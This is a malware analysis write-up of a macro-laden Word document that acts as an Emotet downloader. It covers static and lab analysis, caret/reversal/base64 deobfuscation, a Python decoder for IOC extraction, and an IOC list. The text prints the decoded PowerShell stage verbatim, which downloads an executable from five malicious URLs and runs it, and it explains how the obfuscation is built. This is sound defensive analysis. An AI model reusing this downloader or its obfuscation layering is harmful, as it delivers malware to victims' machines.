This write-up is for a macro embedded doc used as a downloader for Emotet.
Author: 5k33tz
MD5: 43d2a3df73fdcb10b9429a480d96ddcf
This sample first came to my attention by way of an alert for a download from an Emotet-related URL. Looking at the PCAP, I see a GET request to imdavidlee.com/9493MG/biz/US.
After grabbing the file from the source and hashing it, I realized there were already 21/44 detections on VT. So I wanted to do some manual analysis to strengthen my skills and see how this sample works.
Running file against the sample:
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Arorupyzheh-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Sat Aug 25 00:31:00 2018, Last Saved Time/Date: Sat Aug 25 00:31:00 2018, Number of Pages: 1, Number of Words: 3, Number of Characters: 21, Security: 0
We can see it's a Word document in the legacy OLE2 (Composite Document File) container, but probably the most interesting thing is the Author metadata: Arorupyzheh-PC.
Running the doc through oledump.py, we can see that there are some macro streams embedded (oledump flags them with "M"):
Next we can select one of the macros, decompress it and dump it out (oledump.py -s 9 -v); here is a truncated screenshot of the macro in item 9:
Since both macros are so heavily obfuscated, I decided to try some dynamic/behavioral analysis to see if we can get the deobfuscation routine to do the work for us and see the end-result.
In my Windows REM VM I have Process Hacker running to monitor the process tree, and Process Monitor to view any command execution and file-system changes that may occur.
Also in my lab I have a REMnux VM that's set up as my default gateway, so I can monitor any "internet bound" traffic that's generated from my victim VM. On this VM I started up fakedns to resolve any DNS requests, INetSim to handle any file downloads, and Wireshark to get the in-depth packet data if needed.
With the tools running, I open the doc, and see it prompts the user to enable macros:
After clicking "Enable Content" and letting the macros do their thing, we can see in Process Hacker that WINWORD.EXE launches cmd.exe, which then launches powershell.exe:
We could jump to the Linux VM and hopefully see any DNS resolution attempts or file download attempts, but first I'm interested to see the command-line invocations of cmd and PowerShell.
Saving the Process Monitor output to a CSV and importing it into ProcDOT will give us a visualization of what the macros did on the system.
Viewing the command-line details for cmd.exe, we see the following:
Cleaning this up a bit and getting rid of the carets (cmd.exe drops a lone caret and keeps the character after it, so they are pure noise to the parser), we can see what looks like a base64 encoded command:
Interestingly enough, the base64 string and powershell -e are in reverse order, and the for loop at the end appears to un-reverse the command before launching it in PowerShell. Reversing and decoding the base64 encoded string (PowerShell -e expects base64 of the UTF-16LE script) finally gives us some domains:
$BsQ=new-object Net.WebClient;$ipU='http://blog.bctianfu.cn/4@http://mail.vcacademy.lk/5nLo@http://lamemoria.in/2ib2Pt@http://tropicalislandrealtyofflorida.com/NNqM7W@http://businessarbitr.ru/E'.Split('@');$Gku = '707';$hBG=$env:public+'\'+$Gku+'.exe';foreach($CcE in $ipU){try{$BsQ.DownloadFile($CcE, $hBG);Invoke-Item $hBG;break;}catch{}}
The PowerShell script splits a single '@'-delimited string into an array of URLs, then loops through them: for each one it attempts to download whatever is being hosted (presumably Emotet) to C:\Users\Public\707.exe ($env:public + '\' + '707' + '.exe'), runs it with Invoke-Item, and breaks out of the loop on the first successful download. Failures are swallowed by the empty catch block, so it simply moves on to the next URL.
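The deobfuscation steps described above (strip carets, un-reverse, base64-decode the UTF-16LE payload) and the IOC extraction from the decoded stage can be scripted so the next sample of this kind is handled without a detonation. The following Python is an added example and not code from the write-up; the original cmd.exe command line only appears as a screenshot, so the obfuscated input here is constructed from the decoded PowerShell shown above by re-applying the layers the write-up describes (the caret spacing and the exact layout of the constructed string are assumptions, not the sample's real command line).

```python
import base64
import re

# Decoded PowerShell stage from the write-up (the only layer shown verbatim on
# the page). It is used here to build a constructed test input that reproduces
# the obfuscation the write-up describes: base64(UTF-16LE) for -e, the whole
# "powershell -e <b64>" string reversed, and cmd.exe carets sprinkled in.
DECODED_PS = (
    "$BsQ=new-object Net.WebClient;"
    "$ipU='http://blog.bctianfu.cn/4@http://mail.vcacademy.lk/5nLo@"
    "http://lamemoria.in/2ib2Pt@http://tropicalislandrealtyofflorida.com/NNqM7W@"
    "http://businessarbitr.ru/E'.Split('@');"
    "$Gku = '707';$hBG=$env:public+'\\'+$Gku+'.exe';"
    "foreach($CcE in $ipU){try{$BsQ.DownloadFile($CcE, $hBG);Invoke-Item $hBG;break;}catch{}}"
)


def build_obfuscated(script: str) -> str:
    """Constructed stand-in for the sample's cmd.exe argument (assumption: a
    caret every six characters; the real sample's spacing is not on the page)."""
    b64 = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    reversed_cmd = f"powershell -e {b64}"[::-1]
    chunks = [reversed_cmd[i:i + 6] for i in range(0, len(reversed_cmd), 6)]
    return "^".join(chunks)


def strip_carets(s: str) -> str:
    """cmd.exe treats '^' as an escape: it drops the caret and keeps the next
    character, so '^^' becomes a literal '^'. Same rule applied here."""
    return re.sub(r"\^(.)", r"\1", s, flags=re.DOTALL)


# Matches "powershell -e <base64>" including the long-form -EncodedCommand.
ENC_RE = re.compile(
    r"powershell(?:\.exe)?\b.*?-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)",
    re.I | re.S,
)


def decode_encoded_command(cmdline: str):
    """Recover the PowerShell script from an obfuscated cmd.exe command line.
    Tries the de-careted text as-is and reversed, since this sample stored the
    string backwards and un-reversed it with a for loop at runtime."""
    cleaned = strip_carets(cmdline)
    for candidate in (cleaned, cleaned[::-1]):
        m = ENC_RE.search(candidate)
        if not m:
            continue
        try:
            return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            continue
    return None


URL_RE = re.compile(r"https?://[^\s'\"@]+")
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*'([^']*)'")
DROP_RE = re.compile(r"\$env:public\+'\\'\+\$(\w+)\+'\.exe'", re.I)


def extract_iocs(ps: str) -> dict:
    """Pull download URLs and the drop path out of the decoded stage. The drop
    path rule only understands the $env:public+'\\'+$var+'.exe' shape this
    sample uses; $env:public is resolved to its default value."""
    strings = dict(ASSIGN_RE.findall(ps))   # $name='literal' assignments
    drop = None
    m = DROP_RE.search(ps)
    if m and m.group(1) in strings:
        drop = "C:\\Users\\Public\\" + strings[m.group(1)] + ".exe"
    return {"urls": URL_RE.findall(ps), "drop_path": drop}


if __name__ == "__main__":
    sample = build_obfuscated(DECODED_PS)
    recovered = decode_encoded_command(sample)
    print(recovered)
    print(extract_iocs(recovered))
```

Running it prints the decoded downloader and then the five URLs plus C:\Users\Public\707.exe; point decode_encoded_command at the real command line from Process Monitor (copied out of the CSV) and the same routine applies, as long as the sample uses the same reverse-and-caret layering.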
Unfortunately at the time of analysis, none of the binaries were hosted on the sites.
IOCs:
http://imdavidlee.com/9493MG/biz/US
43d2a3df73fdcb10b9429a480d96ddcf
Arorupyzheh-PC
http://blog.bctianfu.cn/4
http://mail.vcacademy.lk/5nLo
http://lamemoria.in/2ib2Pt
http://tropicalislandrealtyofflorida.com/NNqM7W
http://businessarbitr.ru/E
C:\Users\Public\707.exe